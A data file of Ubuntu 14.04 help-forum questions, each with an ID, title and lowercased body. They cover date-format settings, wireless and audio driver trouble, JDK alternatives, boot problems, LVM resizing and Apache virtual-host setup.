460098	make nautilus display iso format for date-time ( ubuntu 14.04 )	i have locale set for en_dk nautilus still displays non-standardized date-time format . is there a way to make it behave and display iso standard ?
460100	broadcom wireless bcm4312 issues	i installed lubuntu 14.04 on my wife 's old netbook . i can not get the wireless to work . i initially installed the sta driver , but it did not work . i then removed it and installed the b43 driver . synaptic package manager shows that firmware-b43-lpphy-installer and b43-fwcutter are installed and that bcmwl-kernel-source is not installed . yet when i go to the additional drivers screen is says that broadcom bcm4312 is not working and is using bcmwl-kernel-source ( which i know is not installed ) . it also shows `` unknown device '' and gives me the option to continue using manually installed driver if i try to do so , nothing happens . there is also a grayed out option that says using non-free firmware for linux kernel from linux-firmware-non-free . any help would be appreciated . i am at my wits end , and the wife is threatening to go buy a windows computer . ok , it is not a blacklist issue . here is the result of the dmesg | grep b43 command : [ 17.652124 ] b43-phy0 : broadcom 4312 wlan found ( core revision 15 ) [ 17.728574 ] b43-phy0 : found phy : analog 6 , type 5 ( lp ) , revision 1 [ 22.268301 ] b43-phy0 : loading firmware version 478.104 ( 2008-07-01 00:50:23
460101	xfce4-power-manager suspend not available for lid close	running a clean install of ubuntustudio 14.04 the suspend and resume works when using the power button or selecting it from the user menu but is not available in the xfce4-power-manager-settings . only `` lock screen '' or `` nothing '' is available for lid close action . http : //docs.xfce.org/xfce/xfce4-power-manager/faq suggests that it is likely permissions issue since suspend/resume clearly works . my single user on a single user system has the following group memberships : username adm cdrom sudo audio dip plugdev lpadmin sambashare any suggestions ? i 'd rather not fry my new hdd because i forgot to suspend and just close the lid . updates : changing `` /etc/systemd/logind.conf '' settings have no effect . this appears to be a bug in upower https : //bugzilla.redhat.com/show_bug.cgi ? id=1005234 i 've confirmed this is not an issue with my hardware on the standard ubuntu desktop ( using a live drive ) i 've confirmed this is not an issue with xubuntu ! ? ! ( i had to enable suspend in the xfce4-power-manager-settings but it was an option ) changing kernel to linux-general has no affect . xfce4-power-manager -- dump & sudo xfce4-power-mangager -- dump -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - xfce power manager version 1.2.0 with policykit support with network manager support with dpms support -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - can suspend : false can hibernate : false can spin down hard disks : true authorized to suspend : true authorized to hibernate : true authorized to shutdown : true authorized to spin down hard disks : false has battery : true has brightness panel : true has power button : true has hibernate button : true has sleep button : true has lid : true
460104	multiple jdk is not working properly in ubuntu 14.04	jdk versions ( jdk1.7.0_21 and jdk1.7.0_55 ) installed and configured like below . jdk1.7.0_21 update-alternatives -- install `` /usr/bin/java '' `` java '' `` /usr/lib/jvm/jdk1.7.0_21/bin/java '' 1 update-alternatives -- install `` /usr/bin/javac '' `` javac '' `` /usr/lib/jvm/jdk1.7.0_21/bin/javac '' 1 update-alternatives -- install `` /usr/bin/javaws '' `` javaws '' `` /usr/lib/jvm/jdk1.7.0_21/bin/javaws '' 1 sudo chmod a+x /usr/bin/java sudo chmod a+x /usr/bin/javac sudo chmod a+x /usr/bin/javaws sudo chown -r root : root /usr/lib/jvm/jdk1.7.0_21 jdk1.7.0_55 update-alternatives -- install `` /usr/bin/java '' `` java '' `` /usr/lib/jvm/jdk1.7.0_55/bin/java '' 1 update-alternatives -- install `` /usr/bin/javac '' `` javac '' `` /usr/lib/jvm/jdk1.7.0_55/bin/javac '' 1 update-alternatives -- install `` /usr/bin/javaws '' `` javaws '' `` /usr/lib/jvm/jdk1.7.0_55/bin/javaws '' 1 sudo chmod a+x /usr/bin/java sudo chmod a+x /usr/bin/javac sudo chmod a+x /usr/bin/javaws sudo chown -r root : root /usr/lib/jvm/jdk1.7.0_55 and i am choosing/changing the default jdk by update-alternatives -- config java update-alternatives -- config javac update-alternatives -- config javaws after this if i run java -version while jdk1.7.0_55 is default , output 's like below . root @ ssa-lpt : /usr/lib/jvm # java -version java version `` 1.7.0_55 '' java ( tm ) se runtime environment ( build 1.7.0_55-b13 ) java hotspot ( tm ) 64-bit server vm ( build 24.55-b03 , mixed mode ) but while jdk1.7.0_21 is default it gives an message like java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory if i issue : locate libjli.so /usr/lib/jvm/jdk1.7.0_55/jre/lib/amd64/jli/libjli.so /usr/lib/jvm/jdk1.7.0_55/lib/amd64/jli/libjli.so so it 's clear that though i selected jdk1.7.0_21 but somehow it 's still pointing to jdk1.7.0_55 tried to rename the jdk1.7.0_55 but no luck . not sure how to fix this . thanks in advance for your help : ) solution : : my jdk1.7.0_21 was broken downloaded a fresh copy form oracle untar it in /usr/lib/jvm/ that was it .
460105	running ubuntu on toshiba satellite c55 series w/ windows 8.1	i have downloaded quite a few versions of ubuntu and installed them on my system . when i boot up they give me the option of switching between windows 8.1 or ubuntu . when i choose to load up ubuntu it says that there is a problem with the \ubuntu\winboot\wubildr.mbr file ( status : 0xc000007b ) . the info it gives is that the application or operating system could n't be loaded because a required file is missing or contains errors . how do i fix the file or is this a compatibility issue . would appreciate any comments .
460107	how to convert an xcf file [ image ] to jpg or png	i have gimp photo editor which automatically saves the converted files in xcf format but they can not be reopened with any other app and thats the reason for this question please help me
460112	text editor for developers	what 's the text editor that appears in the photo on the `` ubuntu for developers '' presentation on the ubuntu website ?
460116	wifi dongle hanging connection every couple of minutes 14.04	i 'm running a fresh install off ubuntu 14.04 and using the following wifi adpter : lsusb bus 003 device 005 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan adapter my connection is really unstable a disconnects after a couple of minutes . then i need to disable the wifi and re-activate it . here is some more info ( based on this issues : wifi keeps droping every minute on ubuntu 12.04 ) lsmod | grep rtl rtl8192cu 67723 0 rtl_usb 18448 1 rtl8192cu rtlwifi 63475 2 rtl_usb , rtl8192cu rtl8192c_common 53172 1 rtl8192cu mac80211 626489 3 rtl_usb , rtlwifi , rtl8192cu cfg80211 484040 2 mac80211 , rtlwifi iwconfig | grep power eth0 no wireless extensions . lo no wireless extensions . bit rate=6.5 mb/s tx-power=20 dbm power management : off may 3 17:03:34 guava dhclient : dhcprequest of 192.168.1.26 on wlan0 to 255.255.255.255 port 67 ( xid=0x237c41a8 ) may 3 17:03:34 guava networkmanager [ 939 ] : < info > ( wlan0 ) : dhcpv4 state changed preinit - > reboot may 3 17:03:34 guava networkmanager [ 939 ] : < info > address 192.168.1.26 may 3 17:03:34 guava networkmanager [ 939 ] : < info > prefix 24 ( 255.255.255.0 ) may 3 17:03:34 guava networkmanager [ 939 ] : < info > gateway 192.168.1.254 may 3 17:03:34 guava networkmanager [ 939 ] : < info > nameserver '192.168.1.254' may 3 17:03:34 guava networkmanager [ 939 ] : < info > nameserver '192.168.1.254' may 3 17:03:34 guava networkmanager [ 939 ] : < info > domain name 'lan' may 3 17:03:34 guava networkmanager [ 939 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... may 3 17:03:34 guava networkmanager [ 939 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) started ... may 3 17:03:34 guava avahi-daemon [ 829 ] : joining mdns multicast group on interface wlan0.ipv4 with address 192.168.1.26 . may 3 17:03:34 guava avahi-daemon [ 829 ] : new relevant interface wlan0.ipv4 for mdns . may 3 17:03:34 guava avahi-daemon [ 829 ] : registering new address record for 192.168.1.26 on wlan0.ipv4 . may 3 17:03:35 guava networkmanager [ 939 ] : < info > ( wlan0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] may 3 17:03:35 guava networkmanager [ 939 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) complete . may 3 17:03:35 guava networkmanager [ 939 ] : < info > ( wlan0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] may 3 17:03:35 guava networkmanager [ 939 ] : < info > networkmanager state is now connected_global may 3 17:03:35 guava networkmanager [ 939 ] : < info > policy set 'homewifi ' ( wlan0 ) as default for ipv4 routing and dns . may 3 17:03:35 guava networkmanager [ 939 ] : < info > writing dns information to /sbin/resolvconf may 3 17:03:35 guava networkmanager [ 939 ] : < info > activation ( wlan0 ) successful , device activated . thanks in advance .
460122	how can i make the `` watch '' command display iso date-time format ?	i often open a terminal and use the `` watch '' command like so : watch sockstat watch displays non-sensical united-states date-time format . how can i make it display the standard iso date-time format ? my current locale is set to denmark ( en_dk ) .
460124	how to boot from usb using grub 2 in an ubuntu-only system	ok , so my ubuntu 14.04 got messed up in a most peculiar way ( program central wo n't start , system refuses to update ) and i want to completely wipe the entire system and reinstall from a usb using pendrive linux uui ( yes , i do not care about any personal files ) . i thought i could do this from the grub 2 menu , but it turns out that i get an `` invalid efi filepath '' -error when i try to boot from the usb ... my system is ubuntu-only and i can not therefore choose `` boot from usb '' in the bios settings . cheers !
460131	replace link for pictures in nautilus `` places '' with symbolic link to an external or other internal drive ? ubuntu 14.04	i have many pictures and when i open shotwell it takes a very long time to load . i can see the shotwell window and the progress bar though i do not see the thumbnails until after the indexing is complete . upping to 12gb of ram has n't helped that much . my guess is that part of the issue is because my picture folder is very large and is on the same disk as my os . it makes sense to me that it would be much easier on my computer if large files are stored on a separate disk from my os disk . anyone know how i could achieve this ? i want to replace the link in nautilus `` places '' not add a bookmark .
460132	how to find the version of ubuntu before booting it ?	i 'm running ubuntu os . i have 3 flash drives ( aka usb 's ) and i make all the three usb 's as bootable through unetbootin with , 1st usb contains ubuntu 14.04 desktop version-amd64 2nd contains ubuntu 13.10 server version-amd64 3rd contains ubuntu 12.10 desktop version-i386 and i failed to mark the versions on the usb drives for my identification . now i have to boot from each usb drive to know the version of ubuntu exists in that . is there any way to find the version , codename , architecture of ubuntu os exists in that drives without booting it ?
460134	unable to install ubuntu 14.04 lts on sony vaio t-series laptop	i have a sony vaio t-series ( svt15117cds ) laptop that came pre-installed with windows 8 . after having the computer for a while , i updated it to windows 8.1 . i now want to put ubuntu 14.04 lts onto the computer alongside windows 8.1 . i want to have an ubuntu 14.04 lts / windows 8.1 dual-boot system . when i try to install ubuntu in uefi boot mode i get the following error after staring at the ubuntu loading screen for over a minute : busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) build-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) unable to find a medium containing a live file system i am using unetbootin to set up my usb key with the proper files . i run into the same problem as above when i try it with secure boot enabled and disabled . when i try booting in legacy mode , i simply get a black screen saying `` no operating system found '' . the user in this forum topic seems to have the exact same issue as me : http : //ubuntuforums.org/showthread.php ? t=2108810 however , i was unable to make sense of how they resolved the problem . the volumes on the disk are set up using the gpt partition style . here is a screenshot of my disks : is there anything i can do to get ubuntu working on this laptop ? thanks !
460137	uninstalled libgconf2-4 by mistake now i cant reinstall it , need help	you might want to run apt-get -f install to correct these : the following packages have unmet dependencies : aisleriot : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed gconf-service-backend : depends : libgconf-2-4 ( = 3.2.6-0ubuntu2 ) but it is not going to be installed gconf2 : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed gnome-terminal : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed google-chrome-stable : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed libgconf2-4 : depends : libgconf-2-4 ( = 3.2.6-0ubuntu2 ) but it is not going to be installed libgnome2-0 : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed libgnomevfs2-0 : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed libreoffice-core : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed libreoffice-gnome : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed network-manager-gnome : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed python-gconf : depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
460138	hdmi / displayport audio at wrong bitrate ( audio too high and fast	i am trying to play audio from an ubuntu 14.04 dell precision m3800 through a dell u2414h monitor ; the monitor has hdmi and displayport connectivity and has an audio out feature ; it can supply analogue audio from the hdmi / displayport feed . this audio works but is at the wrong bitrate ; a video demonstrating this problem can be seen here . this happens via hdmi and displayport . what should be a 440hz comes out of the speakers plugged into the screen as 527.9hz . this ratio seems quite close to the ratio between two adjacent bitrates ( eg . 32khz- > 41khz ) . some system info : pacmd : $ pacmd list-sinks welcome to pulseaudio ! use `` help '' for usage information . > > > 2 sink ( s ) available . * index : 1 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 56 % 1 : 56 % 0 : -14.99 db 1 : -14.99 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 2 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 1.00 .. 371.52 ms card : 2 < alsa_card.pci-0000_00_1b.0 > module : 7 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc668 analog '' alsa.id = `` alc668 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 2 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xf7a18000 irq 53 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card2 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 8c20 '' device.product.name = `` lynx point high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:2 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analogue stereo '' device.description = `` built-in audio analogue stereo '' alsa.mixer_name = `` realtek alc668 '' alsa.components = `` hda:10ec0668,1028060d,00100003 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : headphones ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : < analog-output-speaker > index : 3 name : < alsa_output.pci-0000_00_03.0.hdmi-stereo > driver : < module-alsa-card.c > flags : hardware decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9950 volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 5 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 1.00 .. 371.52 ms card : 0 < alsa_card.pci-0000_00_03.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` hdmi 0 '' alsa.id = `` hdmi 0 '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 3 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel hdmi '' alsa.long_card_name = `` hda intel hdmi at 0xf7a1c000 irq 52 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:03.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:03.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 0c0c '' device.product.name = `` haswell hd audio controller '' device.form_factor = `` internal '' device.string = `` hdmi:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` hdmi-stereo '' device.profile.description = `` digital stereo ( hdmi ) '' device.description = `` built-in audio digital stereo ( hdmi ) '' alsa.mixer_name = `` intel haswell hdmi '' alsa.components = `` hda:80862807,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : hdmi-output-0 : hdmi / displayport ( priority 5900 , latency offset 0 usec , available : yes ) properties : device.icon_name = `` video-display '' device.product.name = `` dell u2414h '' active port : < hdmi-output-0 > > > > asound : $ cat /proc/asound/card0/codec # 0 codec : intel haswell hdmi address : 0 afg function id : 0x1 ( unsol 0 ) vendor id : 0x80862807 subsystem id : 0x80860101 revision id : 0x100000 no modem function group found default pcm : rates [ 0x0 ] : bits [ 0x0 ] : formats [ 0x0 ] : default amp-in caps : n/a default amp-out caps : n/a state of afg node 0x01 : power states : d0 d3 clkstop epss power : setting=d0 , actual=d0 , clock-stop-ok gpio : io=0 , o=0 , i=0 , unsolicited=0 , wake=0 node 0x02 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=2 , channel=0 digital : enabled genlevel kae digital category : 0x2 iec coding type : 0x0 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 epss power : setting=d0 , actual=d0 node 0x03 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=0 , channel=0 digital : enabled kae digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 epss power : setting=d3 , actual=d3 node 0x04 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=0 , channel=0 digital : enabled kae digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 epss power : setting=d3 , actual=d3 node 0x05 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp control : name= '' hdmi/dp , pcm=3 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=0 , device=0 control : name= '' iec958 playback pro mask '' , index=0 , device=0 control : name= '' iec958 playback default '' , index=0 , device=0 control : name= '' iec958 playback switch '' , index=0 , device=0 control : name= '' eld '' , index=0 , device=3 amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x0b000094 : out detect hbr hdmi dp pin default 0x18560010 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=01 , enabled=1 power states : d0 d3 epss power : setting=d0 , actual=d0 devices : 0 connection : 3 0x02* 0x03 0x04 node 0x06 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp control : name= '' hdmi/dp , pcm=7 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=1 , device=0 control : name= '' iec958 playback pro mask '' , index=1 , device=0 control : name= '' iec958 playback default '' , index=1 , device=0 control : name= '' iec958 playback switch '' , index=1 , device=0 control : name= '' eld '' , index=0 , device=7 amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x0b000094 : out detect hbr hdmi dp pin default 0x18560010 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=02 , enabled=1 power states : d0 d3 epss power : setting=d0 , actual=d0 devices : 0 connection : 3 0x02 0x03* 0x04 node 0x07 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp control : name= '' hdmi/dp , pcm=8 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=2 , device=0 control : name= '' iec958 playback pro mask '' , index=2 , device=0 control : name= '' iec958 playback default '' , index=2 , device=0 control : name= '' iec958 playback switch '' , index=2 , device=0 control : name= '' eld '' , index=0 , device=8 amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x0b000094 : out detect hbr hdmi dp pin default 0x18560010 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=03 , enabled=1 power states : d0 d3 epss power : setting=d0 , actual=d0 devices : 0 connection : 0 in-driver connection : 3 0x02 0x03 0x04 node 0x08 [ vendor defined widget ] wcaps 0xf00000 : mono any ideas what to do ?
460139	way to make iso date-time format universal throughout ubuntu ?	everything in ubuntu has different date-time formats . it is crazy . is there a way to set the standard iso date-time format ( e.g. , 2014-05-03t12:31 ) universally throughout ubuntu so that the iso format overrides everything ? i currently have my locale set to an iso standard ( i.e. , en_dk ) but it is next to useless because few things obeys it . terminal/bash does n't obey it . nautilus does n't obey it . the watch-command does n't obey it .
460140	zte modem is not detected	my zte modem is not detected as cdma modem instead it is detected as usb storage device how i can change its mode to cdma from mass storage mode , here is the demsg output [ 488.321117 ] usb 3-2 : usb disconnect , device number 9 [ 496.930211 ] usb 3-2 : new full-speed usb device number 10 using xhci_hcd [ 496.947491 ] usb 3-2 : new usb device found , idvendor=19d2 , idproduct=fff5 [ 496.947505 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 496.947514 ] usb 3-2 : product : usb storage [ 496.947521 ] usb 3-2 : manufacturer : zte , incorporated [ 496.947528 ] usb 3-2 : serialnumber : 000000000002 [ 496.949155 ] usb-storage 3-2:1.0 : usb mass storage device detected [ 496.949431 ] scsi9 : usb-storage 3-2:1.0 [ 497.949158 ] scsi 9:0:0:0 : cd-rom zte usb storage ffe9 2.31 pq : 0 ansi : 2 [ 497.951145 ] scsi 9:0:0:1 : direct-access zte usb storage ffe9 2.31 pq : 0 ansi : 2 [ 497.958415 ] sr1 : scsi-1 drive [ 497.958688 ] sr 9:0:0:0 : attached scsi cd-rom sr1 [ 497.958868 ] sr 9:0:0:0 : attached scsi generic sg2 type 5 [ 497.964409 ] sd 9:0:0:1 : attached scsi generic sg3 type 0 [ 497.976462 ] sd 9:0:0:1 : [ sdb ] attached scsi removable disk [ 498.059848 ] systemd-udevd [ 2537 ] : failed to apply acl on /dev/sr1 : no such file or directory [ 498.059877 ] systemd-udevd [ 2537 ] : failed to apply acl on /dev/sr1 : no such file or directory please help me in this ... .some times it is automatically changing its mode to modem and most of the time stucking up like this ?
460142	how can i know if a binary is malicious ?	i downloaded a binary file from sourceforge and accidentally run it . how can i know if it is safe ? i added my user to sudoers file before . where can i submit it to scan safety ?
460147	network manager missing from lubuntu 14.04	i upgraded from lubuntu 13.10 to 14.04 , network manager is missing from the tray after upgrading . tried to run nm-applet in terminal , with below reply : '' nm-applet-message : using fallback from indicator to gtkstatusicon '' .
460149	vokoscreen not working on ubuntu 14.04	i been trying to make it work on ubuntu 14.04 , but no luck . how do i fix the error ? full logs starting vokoscreen from terminal vokoscreen [ vokoscreen ] locale : `` en_us '' [ vokoscreen ] version : `` 1.9.0 '' [ vokoscreen ] qt version : 4.8.6 [ vokoscreen ] asoundlib version : `` 1.0.27.2 '' [ vokoscreen ] -- -begin search external tools -- - [ vokoscreen ] `` /usr/bin/ffmpeg '' is a link and pointing to `` /opt/ffmpeg/bin/ffmpeg '' [ vokoscreen ] find pactl [ vokoscreen ] find mkvmerge [ vokoscreen ] -- -end search external tools -- - [ vokoscreen ] -- -begin search videoplayer -- - [ vokoscreen ] find videoplayer : `` /usr/bin/avplay '' [ vokoscreen ] find videoplayer : `` /usr/bin/ffplay '' [ vokoscreen ] find videoplayer : `` /usr/bin/smplayer '' [ vokoscreen ] find videoplayer : `` /usr/bin/totem '' [ vokoscreen ] find videoplayer : `` /usr/bin/vlc '' [ vokoscreen ] -- -end search videoplayer -- - [ vokoscreen ] [ regional selection ] frame locked : false [ vokoscreen ] -- -begin search pulseaudio plugin -- - [ vokoscreen ] found file .asound for pulseaudio plugin [ vokoscreen ] -- -end search pulseaudio plugin -- - [ vokoscreen ] -- -begin pulse unload module -- - [ vokoscreen ] -- -end pulse unload module -- - [ vokoscreen ] -- -begin search alsa capture device -- - [ vokoscreen ] alsa_device_sample ( ) in alsadevice.c : open audio device hw:0,0 ( success ) [ vokoscreen ] alsa_device_sample ( ) in alsadevice.c : samplerate = 44100 [ vokoscreen ] find capturecard : `` [ hw:0,0 ] hda intel pch '' [ vokoscreen ] alsa_device_sample ( ) in alsadevice.c : can not open audio device hw:1,3 ( no such file or directory ) [ vokoscreen ] find capturecard : `` [ hw:1,3 ] hda nvidia '' [ vokoscreen ] -- -end search alsa capture device -- - [ vokoscreen ] -- -begin search pulseaudio capture devices -- - [ vokoscreen ] find capturecard : `` monitor of gf108 high definition audio controller digital stereo ( hdmi ) '' with device : `` alsa_output.pci-0000_01_00.1.hdmi-stereo.monitor '' [ vokoscreen ] find capturecard : `` monitor of built-in audio analog stereo '' with device : `` alsa_output.pci-0000_00_1b.0.analog-stereo.monitor '' [ vokoscreen ] find capturecard : `` built-in audio analog stereo '' with device : `` alsa_input.pci-0000_00_1b.0.analog-stereo '' [ vokoscreen ] -- -end search pulseaudio capture devices -- - [ vokoscreen ] ffmpegcommand : `` -f x11grab -r 25 -s 1366x768 -i :0.0+0,0 -pix_fmt yuv420p -vcodec mpeg4 -ar 48000 -qscale 1 -r 25 /tmp/vokoscreen-vokoscreen/vokoscreen-2014-05-03_22-09-34.mkv '' [ vokoscreen ] ffmpeg is not running [ vokoscreen ] [ regional selection ] frame locked : false the process could not be started . either the is called program is not installed , or the ffmpeg or avconv call faulty or you have not over sufficient permissions to to the program .
460153	multiple sites/virtual hosts not working consistently	i 'm not really sure what information will help getting an answer to this so i 'm going to try a minimal approach . please ask for info that would be helpful . i successfully have 3 drupal sites running on my local dev machine but what made them work is a mystery . i followed http : //klau.si/dev to get the first site up and then installed 2 more . when i first tried to access the 2nd site i kept getting the apache default page instead of the drupal site . i then added a second 'listen ' line to ports.conf and the site started working . so in ports.conf i had : listen 127.0.0.1:80 listen 127.0.0.2:80 i thought this was the answer until i tried to get the 3rd site working and i did not need to add an additional listen to do so . the 3rd site initially did not work , it could not be found . i edited ports.conf , apache2.conf and hosts.conf in an organized way trying to figure out what would make it work but found no pattern . when the site finally started to work it just seemed like magic . from hours of working on this it seems to me there is some config that is not getting refreshed/read into memory and when i make some edit it does and the site starts working . so some specific questions to this : after editing /etc/hosts , sitename.conf , apache2.conf and ports.conf , run a2ensite and then restart apache , is there anything else that needs to be done to be sure all new configuration is loaded ? i 'm confused with the hosts file . should i have all sites on the same ip address like this : 127.0.0.1 localhost 127.0.1.1 ubuntu-05 127.0.0.1 drupal-8.localhost 127.0.0.1 drupal-7-site01.localhost 127.0.0.1 drupal-7-site02.localhost or should they have different ip addresses like this : 127.0.0.1 localhost 127.0.1.1 ubuntu-05 127.0.0.1 drupal-8.localhost 127.0.0.2 drupal-7-site01.localhost 127.0.0.3 drupal-7-site02.localhost thanks in advance for any advice you may have . ( running on ubuntu 14.04 in virtualbox )
460154	mass conversion of images to gif	i have created over 600 images from a simulation i ran . i want to convert these images into a gif format . can you provide me a way to do so and one that allows me to show each image for > 1second .
460155	repair lvm after resize no init found/does n't have requested /sbin/init	on a clean install of ubuntu 14.04 with lvm ( no custom options chosen ) i resized the lvm using the following steps from a ubuntu live usb stick : shrink the root lv with system-config-lvm tool tried to resize the lvm partition with gparted ( first deactivated it in gparted ) pvresize gave an error : can not resize to 93231 extents as later ones are allocated . i checked with pvs -v -- segments /dev/device and discovered the swap was in the way moved swap with sudo pvmove -- alloc anywhere /dev/device:94049-1162374 ( last numbers taken from the pvs output resized the whole lvm partition succesfully with gparted but when i booted from the harddisk i got this error : target filesystem does n't have requested /sbin/init no init found . try passing init= bootarg . and the system wo n't boot , how can i fix this ? when i try to mount the partition from the ubuntu live usb stick it gives me the error along the lines of : ext4-fs bad geometry ( block count exceeds size of device ) so it seems something went wrong with the resizing . i tried to find a solution online but to no avail . next try : reverting back . changing size of lvm in gparted . then tried to change size of root partition with system-config-lvm-tool , but this gives an error that fsck failed , something with bad superblocks . edit : i did some attempts to repair but i did n't have the feeling i was getting close so i decided to invest my time in starting from scratch . i have added some extra info above for whom it might be relevant .
460158	change unity launcher theme	i wan na change theme in ubuntu 14.04 so i read this article . it said use myunitiy but i cant find it in software center . which repository should i add to install myunity ?
460160	detected hardware unit hang with 82566dc / e1001e	i am suddenly having problems with a ubuntu server install . this machine ran fine with 12.04 , 13.10 and also for a while with 14.04 . it started doing this : 12:44:34 e1000e 0000:00:19.0 eth0 : detected hardware unit hang : 12:44:34 tdh < 75 > 12:44:34 tdt < 77 > 12:44:34 next_to_use < 77 > 12:44:34 next_to_clean < 75 > 12:44:34 buffer_info [ next_to_clean ] : 12:44:34 time_stamp < 100e01775 > 12:44:34 next_to_watch < 75 > 12:44:34 jiffies < 100e01ed3 > 12:44:34 next_to_watch.status < 0 > 12:44:34 mac status < 802a3 > 12:44:34 phy status < 792d > 12:44:34 phy 1000base-t status < 3800 > 12:44:34 phy extended status < 3000 > 12:44:34 pci status < 10 > 12:44:34 e1000e 0000:00:19.0 eth0 : reset adapter unexpectedly 12:44:37 e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : rx/tx 12:45:59 e1000e : eth0 nic link is down after that , the interface sometimes comes back , mostly do n't . i have not ruled out broken hardware yet , but i would be surprised if that were the case .
